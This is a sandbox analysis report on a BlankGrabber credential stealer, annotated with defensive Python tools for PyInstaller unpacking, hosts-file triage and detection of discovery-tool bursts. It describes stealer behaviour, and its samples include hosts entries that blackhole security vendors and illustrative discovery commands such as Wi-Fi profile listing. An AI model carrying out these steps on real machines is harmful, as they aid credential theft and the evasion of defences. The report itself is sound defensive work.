Malware Analysis Report

2024-11-15 09:53

Sample ID 241109-drjrtsvrb1
Target spoofedV2.exe
SHA256 e9dbb65873885de12d31b6087a300a03d23eca8af63dd7b1b72927ad11406ea1
Tags
blankgrabber upx collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

e9dbb65873885de12d31b6087a300a03d23eca8af63dd7b1b72927ad11406ea1

Threat Level: Known bad

The file spoofedV2.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber upx collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Clipboard Data

Executes dropped EXE

Modifies system executable filetype association

Reads user/profile data of web browsers

Event Triggered Execution: Component Object Model Hijacking

Unsecured Credentials: Credentials In Files

Accesses cryptocurrency files/wallets, possible credential harvesting

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

UPX packed file

Enumerates processes with tasklist

Hide Artifacts: Hidden Files and Directories

Drops file in Windows directory

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Enumerates physical storage devices

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

System Location Discovery: System Language Discovery

Modifies Internet Explorer settings

Views/modifies file attributes

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Gathers system information

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Runs ping.exe

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Detects videocard installed

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 03:14

Signatures

A stealer written in Python and packaged with Pyinstaller
(no indicator details recorded)

Blankgrabber family
blankgrabber

Unsigned PE
(no indicator details recorded)

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 03:14

Reported

2024-11-09 03:17

Platform

win7-20240708-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

Signatures

Loads dropped DLL
Process: C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe

UPX packed file
upx
(2 hits, no indicator details recorded)

Processes

C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe
"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe
"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

Two instances with an identical command line is the normal shape of a PyInstaller one-file bundle: the bootloader parent unpacks the embedded archive to %TEMP%\_MEI<n> and then re-launches its own executable as the child that hosts the Python interpreter. It is not a sign of process injection or of a second payload.

Network

N/A

No network activity was recorded in this Windows 7 run, and the only file written was the unpacked python311.dll. CPython 3.9 and later do not run on Windows 7, so a PyInstaller payload built on 3.11 is expected to fail before it reaches the stealer code on this platform. Treat behavioral2 (Windows 11) as the representative detonation; the absence of indicators here says nothing about the sample's capability.

Files

C:\Users\Admin\AppData\Local\Temp\_MEI24842\python311.dll

MD5 1e76961ca11f929e4213fca8272d0194
SHA1 e52763b7ba970c3b14554065f8c2404112f53596
SHA256 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0
SHA512 ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

The _MEI<n> directory is PyInstaller's one-file extraction folder and python311.dll is the interpreter it ships: together they confirm the static "packaged with Pyinstaller" signature and pin the runtime to CPython 3.11. The DLL is a stock Python component, so its hashes identify the interpreter build, not the malware; the actual stealer logic is a .pyc inside the PyInstaller archive and has to be carved out of the executable to be read.

memory/2836-23-0x000007FEF5F60000-0x000007FEF654A000-memory.dmp
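The python311.dll drop is the runtime evidence of PyInstaller packaging; the static equivalent is the PyInstaller cookie appended to the executable, which names the interpreter DLL and locates the embedded archive whose table of contents holds the stealer's .pyc. The following is an added example written for this report, not code from the sandbox or from the BlankGrabber project. The cookie layout (the 8-byte MEI magic followed by the network-order struct "!8sIIii64s") is PyInstaller's real format; the input bytes are constructed here to stand in for a PE with a PyInstaller overlay, and the two-way decoding of the Python version field (major*100+minor in current PyInstaller, major*10+minor in old builds) is an assumption made for illustration.

```python
"""Locate and decode a PyInstaller CArchive cookie at the end of an executable.

Added example for this report; not sandbox or BlankGrabber code. The sample
bytes produced by build_sample() are constructed, not taken from spoofedV2.exe.
"""
import struct
from typing import Optional

PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# magic, package length, TOC offset (relative to archive start), TOC length,
# Python version, interpreter DLL name (NUL padded)
COOKIE_FMT = "!8sIIii64s"
COOKIE_LEN = struct.calcsize(COOKIE_FMT)  # 88 bytes


def decode_pyvers(pyvers: int) -> str:
    """Current PyInstaller stores 311 for 3.11; old builds stored 37 for 3.7 (assumption: both encodings)."""
    major, minor = divmod(pyvers, 100) if pyvers >= 100 else divmod(pyvers, 10)
    return f"{major}.{minor}"


def find_cookie(data: bytes) -> Optional[dict]:
    """Return the decoded cookie nearest the end of the file, or None if there is none."""
    pos = data.rfind(PYINST_MAGIC)
    if pos < 0 or pos + COOKIE_LEN > len(data):
        return None
    magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FMT, data, pos)
    # The cookie is the last thing in the package, so the archive starts pkg_len
    # bytes before the end of the cookie; the TOC offset is relative to that start.
    archive_start = pos + COOKIE_LEN - pkg_len
    return {
        "cookie_offset": pos,
        "package_len": pkg_len,
        "archive_start": archive_start,
        "toc_offset": toc_off,
        "toc_abs_offset": archive_start + toc_off,
        "toc_len": toc_len,
        "python_version": decode_pyvers(pyvers),
        "pylib": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def build_sample() -> bytes:
    """Constructed stand-in for a PE with a PyInstaller one-file overlay."""
    pe_stub = b"MZ" + b"\x00" * 510          # fake PE header and body, 512 bytes
    archive_body = b"\xaa" * 1024            # stands in for compressed entries plus TOC
    toc_off, toc_len = 900, 124              # TOC lies inside archive_body
    pkg_len = len(archive_body) + COOKIE_LEN  # package length includes the cookie
    cookie = struct.pack(COOKIE_FMT, PYINST_MAGIC, pkg_len, toc_off, toc_len, 311,
                         b"python311.dll".ljust(64, b"\x00"))
    return pe_stub + archive_body + cookie


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    info = find_cookie(blob)
    print(info if info else "no PyInstaller cookie found")
```

Run it against the executable itself (python3 cookie.py spoofedV2.exe); a hit whose pylib reads python311.dll ties the static artifact to the dropped DLL in the table above, and the returned TOC offset is where an extractor would begin walking the archive entries.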

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 03:14

Reported

2024-11-09 03:18

Platform

win11-20241007-en

Max time kernel

210s

Max time network

211s

Command Line

"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

The target here is the hosts file, not a driver. It is opened for modification three times: once by the sample and twice by attrib.exe, which changes file attributes rather than content, a sequence consistent with clearing the read-only or hidden attribute, writing the file, and restoring it. BlankGrabber's builder includes an option to block security-vendor sites by mapping their hostnames to a blackhole address in hosts. The entries written are not reproduced in this report, so the hosts file of any affected machine should be read directly rather than inferred from this table.
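Because the sandbox records only that hosts was opened for modification, the responder's next step is to read the file and separate stealer-style blackholing from ordinary entries. The following is an added example written for this report, not code from the sandbox or from BlankGrabber; the hosts content it parses is constructed to show the pattern, and the keyword list of security vendors is a starting point chosen for the example, not an authoritative list.

```python
"""Triage a Windows hosts file for blackholed or redirected security-vendor hostnames.

Added example for this report; not sandbox or BlankGrabber code. SAMPLE_HOSTS
is constructed; the report does not include the real contents of the file.
"""
import ipaddress

# Addresses a stealer points hostnames at so the target can never be reached.
BLACKHOLE_IPS = {"0.0.0.0", "127.0.0.1", "::1"}
# Substrings of vendor/update hostnames worth escalating on (assumption: illustrative list).
SECURITY_KEYWORDS = ("virustotal", "avast", "kaspersky", "malwarebytes", "bitdefender",
                     "mcafee", "norton", "eset", "sophos", "trendmicro", "windowsupdate", "defender")
LOCAL_NAMES = {"localhost", "localhost.localdomain"}


def parse_hosts(text: str):
    """Yield (line_no, ip, [hostnames]) for active entries; comments and blanks are skipped."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # strip trailing comments
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                          # malformed line; Windows ignores it as well
        yield n, str(ip), parts[1:]


def triage_hosts(text: str) -> list:
    """Return one finding per hostname, with a severity based on where it is pointed."""
    findings = []
    for n, ip, names in parse_hosts(text):
        for name in names:
            lname = name.lower()
            if lname in LOCAL_NAMES:
                continue                      # the stock localhost mapping is fine
            vendor = any(k in lname for k in SECURITY_KEYWORDS)
            if ip in BLACKHOLE_IPS:
                reason, sev = "blackholed", ("high" if vendor else "medium")
            else:
                # A real address for a hostname is a redirect (phishing, update hijack).
                reason, sev = "redirected", ("high" if vendor else "low")
            findings.append({"line": n, "host": name, "ip": ip, "reason": reason, "severity": sev})
    return findings


# Constructed sample: default Windows header plus entries of the kind a stealer writes.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#   127.0.0.1       localhost
#   ::1             localhost
0.0.0.0 www.virustotal.com
0.0.0.0 virustotal.com
0.0.0.0 www.avast.com
127.0.0.1 www.malwarebytes.com
192.0.2.10 login.example.com   # constructed redirect to a TEST-NET address
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_HOSTS
    for f in triage_hosts(text):
        print(f"{f['severity']:6} line {f['line']:>3} {f['reason']:10} {f['host']} -> {f['ip']}")
```

Point it at a copy of C:\Windows\System32\drivers\etc\hosts taken from the affected host; since attrib.exe was involved in this run, also record the file's attributes and modification time before touching it, because restoring the hosts file is part of remediation and the timestamps help bound when the stealer ran.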

Clipboard Data

collection
Processes: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, C:\Windows\system32\cmd.exe

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Both of these signatures, and the "Modifies registry class", "Modifies Internet Explorer settings", "Checks processor information in registry" and "System Language Discovery" entries further down, are attributed to C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe, not to the sample or to any process it is shown spawning. The values written (the FileSyncEx context-menu handler, the FileSyncClient and SyncEngine interfaces, FileSyncShell64.dll and FileCoAuth.exe under the OneDrive install directory) are OneDrive's own per-user COM and shell-extension registrations. This export does not reproduce the process tree, so it cannot be settled here whether OneDrive.exe, OneDriveSetup.exe and chrome.exe were started by the sample or are background activity of the sandbox image; do not report these rows as persistence established by the sample without that tree.

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Indicator: ip-api.com

ip-api.com is a public IP geolocation API, so the request itself is benign. Its value is as a correlation point: a process launched from %TEMP% resolving and querying it shortly after start-up, before any other outbound traffic, is the stealer collecting the victim's public IP and location for its report.

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Process: C:\Windows\system32\tasklist.exe (4 invocations, command lines not recorded)

Hide Artifacts: Hidden Files and Directories

defense_evasion
Process: C:\Windows\system32\cmd.exe

UPX packed file

upx
(59 hits, no indicator details recorded)

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

All three rows are reads of HKLM\SOFTWARE\Microsoft\NetSh by netsh.exe; nothing is written. netsh enumerates this key every time it starts in order to load its helper DLLs, so these rows are a side effect of the netsh.exe invocation recorded under Wi-Fi Discovery below, not evidence of helper-DLL persistence. That claim would require a value set under this key naming a non-Microsoft DLL, which this run does not show.

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Processes: C:\Windows\system32\PING.EXE, C:\Windows\system32\cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Processes: C:\Windows\system32\cmd.exe, C:\Windows\system32\netsh.exe

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Detects videocard installed

Process: C:\Windows\System32\Wbem\WMIC.exe

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Gathers system information

Process: C:\Windows\system32\systeminfo.exe
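Taken together, the discovery rows above (tasklist.exe, netsh.exe for Wi-Fi profiles, WMIC.exe for the video card, systeminfo.exe, PING.EXE) plus the hosts-file writes by the sample and attrib.exe form a burst of built-in tools fired from a process living in %TEMP% within a couple of minutes, which is a far stronger detection than any single tool. The following is an added example written for this report, not code from the sandbox or from BlankGrabber. It runs the correlation over constructed Sysmon-style process-creation and file-modification events; the image names mirror those the sandbox attributed to this run, but the command lines are illustrative, since the report records none, and the process IDs and timestamps are invented.

```python
"""Correlate a discovery/hosts-tampering burst back to a root process in a user-writable path.

Added example for this report; not sandbox or BlankGrabber code. SAMPLE_EVENTS is
constructed; the command lines are illustrative, not taken from the analysed run.
"""
from dataclasses import dataclass, field

DISCOVERY_TOOLS = {"tasklist.exe", "netsh.exe", "wmic.exe", "systeminfo.exe", "ping.exe"}
HOSTS_PATH = "c:\\windows\\system32\\drivers\\etc\\hosts"
# Path fragments that mark an executable as living somewhere an unprivileged user can write.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")


@dataclass
class Event:
    ts: float
    kind: str            # "proc" (process create) or "file" (file opened for modification)
    pid: int
    ppid: int = 0
    image: str = ""
    cmdline: str = ""
    target: str = ""     # file path for "file" events


@dataclass
class Finding:
    root_pid: int
    root_image: str
    tools: set = field(default_factory=set)
    hosts_writers: list = field(default_factory=list)

    @property
    def score(self) -> int:
        # One point per distinct discovery tool, three for touching the hosts file.
        return len(self.tools) + (3 if self.hosts_writers else 0)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _root_of(pid: int, parent: dict, image: dict, max_depth: int = 64):
    """Walk up the tree and return the top-most ancestor whose image sits in a user-writable path."""
    root, cur = None, pid
    for _ in range(max_depth):               # bounded in case telemetry contains a PID cycle
        if cur not in image:
            break
        if any(m in image[cur].lower() for m in USER_WRITABLE):
            root = cur
        cur = parent.get(cur)
    return root


def detect(events, window_s: float = 120.0, min_tools: int = 3) -> list:
    """Group events under their user-writable root; flag roots with enough tools or a hosts write."""
    ordered = sorted(events, key=lambda e: e.ts)
    parent, image, first_ts = {}, {}, {}
    for e in ordered:
        if e.kind == "proc":
            parent[e.pid], image[e.pid] = e.ppid, e.image
            first_ts.setdefault(e.pid, e.ts)
    findings = {}
    for e in ordered:
        root = _root_of(e.pid, parent, image)
        if root is None or e.ts - first_ts[root] > window_s:
            continue
        f = findings.setdefault(root, Finding(root, image[root]))
        if e.kind == "proc" and _basename(e.image) in DISCOVERY_TOOLS:
            f.tools.add(_basename(e.image))
        elif e.kind == "file" and e.target.lower() == HOSTS_PATH:
            f.hosts_writers.append(_basename(image.get(e.pid, "")))
    return [f for f in findings.values() if len(f.tools) >= min_tools or f.hosts_writers]


SAMPLE_IMG = r"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"
SAMPLE_EVENTS = [  # constructed telemetry, PIDs and timestamps invented
    Event(0.0, "proc", 4000, 800, SAMPLE_IMG, f'"{SAMPLE_IMG}"'),
    Event(1.0, "proc", 4010, 4000, SAMPLE_IMG, f'"{SAMPLE_IMG}"'),           # PyInstaller child
    Event(2.0, "proc", 4020, 4010, r"C:\Windows\system32\cmd.exe", "cmd.exe /c tasklist /FO LIST"),
    Event(2.1, "proc", 4021, 4020, r"C:\Windows\system32\tasklist.exe", "tasklist /FO LIST"),
    Event(3.0, "proc", 4030, 4010, r"C:\Windows\system32\cmd.exe", "cmd.exe /c netsh wlan show profiles"),
    Event(3.1, "proc", 4031, 4030, r"C:\Windows\system32\netsh.exe", "netsh wlan show profiles"),
    Event(4.0, "proc", 4040, 4010, r"C:\Windows\System32\Wbem\WMIC.exe", "wmic path win32_VideoController get name"),
    Event(5.0, "proc", 4050, 4010, r"C:\Windows\system32\systeminfo.exe", "systeminfo"),
    Event(6.0, "file", 4010, target=r"C:\Windows\System32\drivers\etc\hosts"),
    Event(6.2, "proc", 4060, 4010, r"C:\Windows\system32\attrib.exe", r"attrib -r C:\Windows\System32\drivers\etc\hosts"),
    Event(6.3, "file", 4060, target=r"C:\Windows\System32\drivers\etc\hosts"),
    Event(7.0, "proc", 5000, 800, r"C:\Windows\System32\cmd.exe", "cmd.exe"),   # admin's own shell, benign
    Event(7.5, "proc", 5001, 5000, r"C:\Windows\system32\PING.EXE", "ping 8.8.8.8"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"score {f.score}: pid {f.root_pid} {f.root_image} tools={sorted(f.tools)} hosts={f.hosts_writers}")
```

The benign cmd.exe/PING.EXE pair from the user's own shell is deliberately left unflagged: its root is not in a user-writable path, so a single ping never scores. Tune min_tools and the window to your environment; software installers also run systeminfo or wmic from %TEMP%, but they do not touch the hosts file, which is why that event carries the extra weight.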

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133755957735794554" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\VersionIndependentProgID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\odopen\shell C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\VersionIndependentProgID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ = "IDeviceHeroShotCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ = "ISyncInformationLookupCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ = "ISyncEngineOcsi" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\odopen\DefaultIcon C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\FileSyncClient.AutoPlayHandler.1 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\ = "IFileSyncClient4" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
